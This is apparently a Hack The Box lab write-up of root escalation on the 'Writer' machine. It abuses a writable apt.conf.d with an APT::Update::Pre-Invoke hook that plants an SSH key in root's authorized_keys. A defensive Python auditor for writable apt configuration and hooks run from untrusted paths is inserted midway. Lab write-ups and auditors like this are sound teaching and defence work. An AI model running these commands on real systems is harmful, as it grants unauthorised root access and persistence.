APT cronjob


The target system appears to have a cronjob configured to run the apt update command every minute. The current user (john) has write access to the apt configuration directory at /etc/apt/apt.conf.d, which apt reads on every run.

john@writer:~$ echo 'echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali" >> ~/.ssh/authorized_keys' > /dev/shm/pe ; chmod 755 /dev/shm/pe

I will first create a script, /dev/shm/pe, which appends my public SSH key to the authorized_keys file of whoever executes it (root in this case).

john@writer:~$ cat /dev/shm/pe
echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali" >> ~/.ssh/authorized_keys

All set.

john@writer:~$ echo 'APT::Update::Pre-Invoke {"/dev/shm/pe";};' > /etc/apt/apt.conf.d/00-pe

Now I will drop a configuration fragment into /etc/apt/apt.conf.d so that apt executes /dev/shm/pe as an APT::Update::Pre-Invoke hook whenever the root cronjob runs the apt update command.
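From the defender's side, the root cause is a package-manager configuration directory that an unprivileged user can write to, combined with apt's hook options, which hand their values to a shell. The audit script below is an added example and is not part of the original write-up or of apt itself: it parses apt.conf fragments for the real Pre-Invoke/Post-Invoke option names (both the `Opt {"cmd";};` and `Opt:: "cmd";` spellings), flags hook commands that reference paths under /dev/shm, /tmp, /var/tmp, /home or /run/user (a heuristic prefix list I chose, not an apt setting), and reports a conf directory or fragment that is writable by group or other. The sample directory it builds, with a stock-looking 70debconf fragment and the 00-pe fragment from this write-up, is constructed test data.

```python
"""Audit an apt.conf.d directory for hook abuse: writable config and hooks run from untrusted paths."""
import os
import re
import stat
import tempfile
from dataclasses import dataclass

# apt/dpkg option names whose values are executed through /bin/sh -c (real apt options).
HOOK_OPTIONS = (
    "APT::Update::Pre-Invoke", "APT::Update::Post-Invoke",
    "APT::Update::Post-Invoke-Success",
    "DPkg::Pre-Invoke", "DPkg::Post-Invoke", "DPkg::Pre-Install-Pkgs",
)
# Heuristic (assumption): no packaged hook runs code from these locations.
UNTRUSTED_PREFIXES = ("/dev/shm", "/tmp", "/var/tmp", "/home", "/run/user")

# Matches both apt.conf spellings:  Opt {"a"; "b";};   and   Opt:: "a";
HOOK_RE = re.compile(
    r"(?P<opt>" + "|".join(re.escape(o) for o in HOOK_OPTIONS) + r")"
    r'\s*(?:::\s*"(?P<single>[^"]*)"|\{(?P<body>[^}]*)\})',
    re.IGNORECASE,  # apt option names are case-insensitive
)
ITEM_RE = re.compile(r'"([^"]*)"')
WRITABLE = stat.S_IWGRP | stat.S_IWOTH


@dataclass
class Finding:
    path: str
    option: str
    command: str
    reason: str


def strip_comments(text):
    """Drop //, # and /* */ comments, but leave double-quoted strings untouched."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str or c == '"':
            out.append(c)
            if c == '"':
                in_str = not in_str
            i += 1
        elif text.startswith("/*", i):
            end = text.find("*/", i + 2)
            i = n if end < 0 else end + 2
        elif c == "#" or text.startswith("//", i):
            end = text.find("\n", i)
            i = n if end < 0 else end
        else:
            out.append(c)
            i += 1
    return "".join(out)


def parse_hooks(text):
    """Return (option, command) pairs declared in one apt.conf fragment."""
    hooks = []
    for m in HOOK_RE.finditer(strip_comments(text)):
        single = m.group("single")
        cmds = [single] if single is not None else ITEM_RE.findall(m.group("body"))
        hooks.extend((m.group("opt"), cmd) for cmd in cmds)
    return hooks


def untrusted_paths(command):
    """Absolute paths inside a hook command that sit under an untrusted prefix."""
    return [
        p for p in re.findall(r"/[^\s;|&'\"()]+", command)
        if any(p == u or p.startswith(u + "/") for u in UNTRUSTED_PREFIXES)
    ]


def audit_dir(conf_dir):
    """Flag a writable conf dir, writable fragments, and hooks that run from untrusted paths."""
    findings = []
    if os.stat(conf_dir).st_mode & WRITABLE:
        findings.append(Finding(conf_dir, "-", "-", "directory writable by group/other"))
    for name in sorted(os.listdir(conf_dir)):
        path = os.path.join(conf_dir, name)
        if not os.path.isfile(path):
            continue
        if os.stat(path).st_mode & WRITABLE:
            findings.append(Finding(path, "-", "-", "fragment writable by group/other"))
        with open(path, encoding="utf-8", errors="replace") as fh:
            for opt, cmd in parse_hooks(fh.read()):
                bad = untrusted_paths(cmd)
                if bad:
                    findings.append(Finding(path, opt, cmd, "hook runs from " + ", ".join(bad)))
    return findings


def build_sample_dir():
    """Constructed sample data: one stock-looking fragment plus the hostile one from the write-up."""
    d = tempfile.mkdtemp(prefix="apt.conf.d-")
    fragments = {
        "70debconf": 'DPkg::Pre-Install-Pkgs {"/usr/sbin/dpkg-preconfigure --apt || true";};\n',
        "00-pe": '// planted by an unprivileged user\nAPT::Update::Pre-Invoke {"/dev/shm/pe";};\n',
    }
    for name, body in fragments.items():
        path = os.path.join(d, name)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
        os.chmod(path, 0o644)
    os.chmod(d, 0o777)  # reproduce the misconfiguration: directory writable by everyone
    return d


if __name__ == "__main__":
    for f in audit_dir(build_sample_dir()):
        extra = f" [{f.option} -> {f.command}]" if f.command != "-" else ""
        print(f"{f.path}: {f.reason}{extra}")
```

Run it against the real directory with `audit_dir("/etc/apt/apt.conf.d")`; on a healthy host the stock fragments all invoke commands under /usr and the directory is root-owned mode 0755, so the function returns an empty list. The same parser can feed a periodic integrity check, since a fresh fragment appearing in that directory between package operations is itself worth an alert.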

┌──(kali㉿kali)-[~/archive/htb/labs/writer]
└─$ ssh root@writer.htb -i ~/.ssh/id_ed25519
Enter passphrase for key '/home/kali/.ssh/id_ed25519': 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
 
  System information as of Wed 19 Apr 22:37:49 UTC 2023
 
  System load:           0.16
  Usage of /:            66.4% of 6.82GB
  Memory usage:          40%
  Swap usage:            0%
  Processes:             272
  Users logged in:       2
  IPv4 address for eth0: 10.10.11.101
  IPv6 address for eth0: dead:beef::250:56ff:feb9:8e54
 
 
0 updates can be applied immediately.
 
 
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
 
 
You have new mail.
Last login: Mon Aug  2 07:27:54 2021
root@writer:~# whoami
root
root@writer:~# hostname
writer
root@writer:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.101  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 dead:beef::250:56ff:feb9:8e54  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:8e54  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:8e:54  txqueuelen 1000  (Ethernet)
        RX packets 1260023  bytes 214491738 (214.4 MB)
        RX errors 0  dropped 240  overruns 0  frame 0
        TX packets 1697929  bytes 805640196 (805.6 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 5124637  bytes 10739777357 (10.7 GB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 5124637  bytes 10739777357 (10.7 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise

Beyond


root@writer:~# crontab -l | grep -v '^#'
MAILTO=""
*/2 * * * * /usr/bin/cp /root/.scripts/disclaimer /etc/postfix/disclaimer
*/2 * * * * /usr/bin/cp /root/.scripts/master.cf /etc/postfix/master.cf
*/2 * * * * /usr/bin/find /etc/apt/apt.conf.d/ -mtime -1 -exec rm {} \;
*/2 * * * * /usr/bin/apt-get update
*/2 * * * * /usr/bin/cp -r /root/.scripts/writer2_project /var/www/
* * * * * /usr/bin/rm /tmp/*

Aha.